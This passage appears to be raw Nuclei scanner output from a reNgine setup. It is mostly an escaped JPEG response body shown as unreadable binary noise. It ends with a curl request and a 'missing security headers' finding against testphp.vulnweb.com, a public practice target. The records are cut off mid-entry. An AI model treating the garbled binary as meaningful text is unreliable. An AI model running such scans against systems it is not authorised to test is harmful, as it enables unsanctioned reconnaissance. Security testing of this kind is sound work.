\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:32.597527426Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: 